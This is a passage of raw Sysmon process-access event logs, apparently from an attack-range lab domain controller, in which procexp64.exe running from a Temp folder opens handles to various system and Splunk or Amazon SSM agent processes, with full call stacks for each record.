ntdll.dll+51791 10341000x8000000000000000787506Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787505Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787504Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787503Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787502Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787501Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787500Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787499Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787498Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787497Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787496Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787495Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787494Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787493Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787492Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787491Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787490Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787489Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERN